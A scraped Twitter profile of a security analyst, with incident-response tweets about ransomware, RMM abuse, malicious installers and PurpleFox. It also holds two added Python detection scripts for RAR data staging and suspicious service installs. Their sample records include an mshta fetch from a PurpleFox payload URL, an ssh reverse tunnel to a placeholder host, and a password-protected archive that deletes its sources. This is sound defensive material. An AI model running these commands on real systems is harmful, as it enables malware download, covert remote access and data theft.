Faith (@f0xtrot_sierra)'s Twitter Profile
Faith

@f0xtrot_sierra

Associate Security Operations Analyst @HuntressLabs

ID:1618553087874015232

Joined 26-01-2023 10:15:41

23 Tweets

410 Followers

30 Following

Josh (@xorJosh):

BianLian Investigation 🧵

Initial access to data Exfil within 3 hours

Initial access via RDPWeb
Enumeration via Manual/Advanced IP scanner
Golang backdoor to tunnel
Data Exfil via MegaSync

Ame (@pe4Chscreeching):

Following the data collection, two user accounts 'administrator' and 'icsadmin' were both altered and given the password 'P@ssw0rd01!'.

The environment was isolated before any further activity could occur.

Ame (@pe4Chscreeching):

An unsuccessful data exfiltration case seen at @HuntressLabs using WinRar 🧵

After the threat actor had access to the host via RDP, WinRar was used to look for specific file extensions within the F:\ drive from the last 365 days and saved the data in parts to 'F:\output.rar'.

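The collection step in the tweet above (archive only files of chosen extensions, only those newer than 365 days, recursed from a whole drive, written as split volumes) maps onto a small set of RAR command-line switches: -tn<time> (newer than), -v<size> (split volumes), -n<mask> (include only matching files), -r (recurse), plus -hp/-p (password) and -df/-dw (delete or wipe sources) for the variants seen in other staging cases. The hunt below is an added example written for this page, not code from Huntress or from the tweet's author: it parses process-creation command lines and scores the archiving traits. The sample records are constructed, the hostnames, users and paths in them are invented, and the "two or more traits" threshold is the example's own choice.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed process-creation records (Sysmon Event ID 1 shape), not data from
# the case. The first mirrors the tweet: chosen extensions, last 365 days,
# recursed from F:\, written as split volumes to F:\output.rar.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": '"C:\\Program Files\\WinRAR\\Rar.exe" a -r -tn365d -v1g -n*.docx -n*.xlsx -n*.pdf F:\\output.rar F:\\'},
    {"host": "WS07", "user": "CORP\\jdoe",
     "cmdline": '"C:\\Program Files\\WinRAR\\WinRAR.exe" x C:\\Users\\jdoe\\Downloads\\report.rar C:\\Users\\jdoe\\Documents\\'},
    {"host": "FS01", "user": "CORP\\svc_backup",
     "cmdline": "C:\\Windows\\Temp\\r.exe a -hpSecret123 -m0 -df C:\\Windows\\Temp\\out.rar \\\\FS02\\finance\\"},
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
RAR_BINARIES = {"rar.exe", "winrar.exe"}
ARCHIVE_CMDS = {"a", "u", "m"}   # add, update, move (move deletes the originals)


@dataclass
class RarFinding:
    command: str
    archive: str
    sources: List[str] = field(default_factory=list)
    volumes: Optional[str] = None       # -v<size>: split into volumes
    newer_than: Optional[str] = None    # -tn<time>: only files newer than <time>, e.g. 365d
    includes: List[str] = field(default_factory=list)  # -n<mask>: only files matching mask
    password_protected: bool = False    # -p<pwd> / -hp<pwd> (-hp also encrypts file names)
    delete_after: bool = False          # -df / -dw: delete or wipe sources after archiving
    recurse: bool = False               # -r: recurse subdirectories
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Creating an archive (not extracting one) with at least two staging traits.
        return self.command in ARCHIVE_CMDS and len(self.reasons) >= 2


def analyze_rar_cmdline(cmdline: str) -> Optional[RarFinding]:
    """Parse one command line; return a finding if it is RAR archiving syntax."""
    tokens = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    if len(tokens) < 3:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    switches = [t for t in tokens[1:] if t.startswith("-")]
    positionals = [t for t in tokens[1:] if not t.startswith("-")]
    if len(positionals) < 2:
        return None  # need at least <command> <archive>
    f = RarFinding(command=positionals[0].lower(), archive=positionals[1], sources=positionals[2:])
    if exe not in RAR_BINARIES:
        if not f.archive.lower().endswith(".rar"):
            return None  # not recognisably RAR; in real telemetry compare OriginalFileName or hash
        f.reasons.append("RAR syntax from non-standard binary name " + exe)
    for sw in switches:
        low = sw.lower()
        if re.match(r"-v\d", low):
            f.volumes = sw[2:]
            f.reasons.append("split volumes " + f.volumes)
        elif low.startswith("-tn"):
            f.newer_than = sw[3:]
            f.reasons.append("time filter newer than " + f.newer_than)
        elif re.match(r"-t[abo]", low):          # -ta<date>, -tb<date>, -to<time>
            f.reasons.append("time filter " + sw)
        elif low.startswith("-hp") or low.startswith("-p"):
            f.password_protected = True
            f.reasons.append("password-protected archive")
        elif low in ("-df", "-dw"):
            f.delete_after = True
            f.reasons.append("sources deleted after archiving")
        elif re.fullmatch(r"-r[0-]?", low):
            f.recurse = True
        elif low.startswith("-n"):
            f.includes.append(sw[2:])
    if f.includes:
        f.reasons.append("extension allow-list " + ",".join(f.includes))
    if any(re.fullmatch(r"[a-z]:\\?", s.lower()) or s.startswith("\\\\") for s in f.sources):
        f.reasons.append("whole drive or UNC share as source")
    return f


def hunt(events):
    """Return (host, user, finding) for every record that looks like staging."""
    hits = []
    for ev in events:
        f = analyze_rar_cmdline(ev["cmdline"])
        if f and f.suspicious:
            hits.append((ev["host"], ev["user"], f))
    return hits
```

Recursion alone is not scored, because legitimate backup jobs recurse too; the combination of a time window, an extension allow-list, volume splitting or a password on a freshly created archive is what separates staging from routine use. The third sample shows why matching on the image name is not enough: a renamed rar.exe still has to be handed RAR syntax.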
Josh (@xorJosh):

@HuntressLabs A Google AD is serving a malicious WinSCP Python installer, resulting in rapid lateral movement 🧵

1. Google AD -> gaweeweb[.]com -> winccp[.]net

Josh (@xorJosh):

Over the past year, had a couple of cases where a new service was created, 'WMI helper agent', which launches 'wmihelper.exe' out of '\AppData\Roaming\Microsoft\Wmi\'; the executable is renamed github.com/winsw/winsw. In both cases this was used to establish persistence via ssh.

Faith (@f0xtrot_sierra):

RMM tool abuse and Akira ransomware, an @Huntresslabs case.

The TA first used RDP to gain access to the network. Once they were in, we observed them installing instances of both AnyDesk and RustDesk remote access tools on multiple hosts to establish footholds in the network.

Josh (@xorJosh):

Today @HuntressLabs likely #PurpleFox infection observed.

Service created to launch mshta for download and then installed with Msiexec

hxxp://61.190.37[.]146:13842/20AC0B78.Png
hxxp://37.238.169[.]235:17541/20AC0B78.Png
hxxp://103.233.65[.]226:17244/20AC0B78.Png

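Both of Josh's service-persistence tweets above (the renamed WinSW wrapper 'wmihelper.exe' under AppData\Roaming, and a service created to launch mshta for the download) come down to the same log source: System Event ID 7045, "A service was installed in the system", whose Service File Name field is the full command the Service Control Manager will run. The triage below is an added example written for this page, not Huntress tooling or the tweet author's code. It flags 7045 records whose binary lives in a user-writable directory, whose command contains a LOLBin or a URL, or whose binary has a WinSW-style XML sidecar: WinSW reads its configuration from a file named after the executable (wmihelper.exe reads wmihelper.xml) and the sidecar's <executable> element is where the real payload, here ssh.exe, is declared. The 7045 records, the in-memory stand-in for the file system, the sidecar's ssh arguments, the 203.0.113.10 address and the cmd /c mshta command shape are all constructed assumptions; only the wmihelper path and the 61.190.37.146 URL come from the tweets.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed System-log Event ID 7045 ("A service was installed") records, not
# data from either case. The first mirrors the WinSW tweet (wmihelper.exe under
# AppData\Roaming); the second is an assumed shape for a service that runs mshta
# against one of the URLs in the PurpleFox tweet; the third is benign.
SAMPLE_7045 = [
    {"ServiceName": "WMI helper agent",
     "ImagePath": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelper.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"ServiceName": "svc_9f2c",  # constructed service name
     "ImagePath": "cmd.exe /c mshta http://61.190.37.146:13842/20AC0B78.Png",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Constructed stand-in for the file system. WinSW reads <exe basename>.xml next
# to the (renamed) wrapper, so the sidecar is where the real payload is declared.
# The ssh arguments and the 203.0.113.10 address are assumptions, not case data.
FAKE_FS = {
    "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Wmi\\wmihelper.xml": (
        "<service>\n"
        "  <id>wmihelper</id>\n"
        "  <name>WMI helper agent</name>\n"
        "  <executable>C:\\Windows\\System32\\OpenSSH\\ssh.exe</executable>\n"
        "  <arguments>-N -R 2222:127.0.0.1:3389 -i C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Wmi\\key user@203.0.113.10</arguments>\n"
        "</service>\n"),
}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')
USER_WRITABLE = re.compile(r"\\(appdata\\(roaming|local)|users\\public|windows\\temp|programdata)\\", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
LOLBINS = {"mshta", "msiexec", "rundll32", "regsvr32", "powershell", "pwsh",
           "cmd", "wscript", "cscript", "certutil", "bitsadmin"}


def tokens_of(image_path: str) -> List[str]:
    return [t.strip('"') for t in TOKEN_RE.findall(image_path)]


def stem(token: str) -> str:
    """Lower-cased file name without a trailing .exe, for LOLBin matching."""
    name = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def winsw_sidecar(image_path: str, fs: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return executable/arguments from a WinSW-style XML sidecar, if one exists."""
    toks = tokens_of(image_path)
    if not toks or not toks[0].lower().endswith(".exe"):
        return None
    content = fs.get(toks[0][:-4] + ".xml")   # WinSW convention: same basename, .xml
    if content is None:
        return None
    try:
        root = ET.fromstring(content)
    except ET.ParseError:
        return None
    if root.tag != "service" or root.findtext("executable") is None:
        return None
    return {"executable": root.findtext("executable"),
            "arguments": root.findtext("arguments") or ""}


def triage_7045(event: Dict[str, str], fs: Dict[str, str]) -> Dict[str, object]:
    """Score one 7045 record; an empty 'reasons' list means nothing stood out."""
    image = event["ImagePath"]
    toks = tokens_of(image)
    reasons: List[str] = []
    if USER_WRITABLE.search(toks[0] if toks else ""):
        reasons.append("service binary in user-writable directory")
    lolbins = sorted({stem(t) for t in toks} & LOLBINS)
    if lolbins:
        reasons.append("LOLBin in service command: " + ", ".join(lolbins))
    urls = URL_RE.findall(image)
    if urls:
        reasons.append("URL in service command")
    sidecar = winsw_sidecar(image, fs)
    if sidecar:
        reasons.append("WinSW-style sidecar config launches " + stem(sidecar["executable"]))
    return {"service": event["ServiceName"], "image": image,
            "account": event.get("AccountName"), "reasons": reasons,
            "urls": urls, "winsw": sidecar}


def hunt(events, fs=FAKE_FS):
    return [t for t in (triage_7045(e, fs) for e in events) if t["reasons"]]
```

In a real investigation the sidecar lookup reads the file next to the service binary (via the EDR or a forensic image) instead of a dictionary; the renamed WinSW binary itself is unremarkable, so the .xml (or, with newer WinSW releases, a YAML sidecar, which this example does not parse) is the artifact that names the tunnel. The service account field is carried through because both persistence cases run as LocalSystem, which is worth surfacing next to the reasons.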
Faith (@f0xtrot_sierra):

Had a RAT case @Huntresslabs, the user downloaded a malicious .js file that led to the download and execution of multiple malicious .ps1 scripts. The RAT reached out to hxxps[://]xyzontheway[.]xyz/wp-admin/images/r.txt cc @GoDaddyHelp please take down.

Faith (@f0xtrot_sierra):

Had a case today @HuntressLabs with all the signs of Chrome Loader, but the initial dropper file downloaded was '7680x4320 Tooth Creative Art 8k 8k HD 4k Wallpa___.msi'
This is a development from .exe and .iso files seen in the past.
VT scan of the original file came up clean
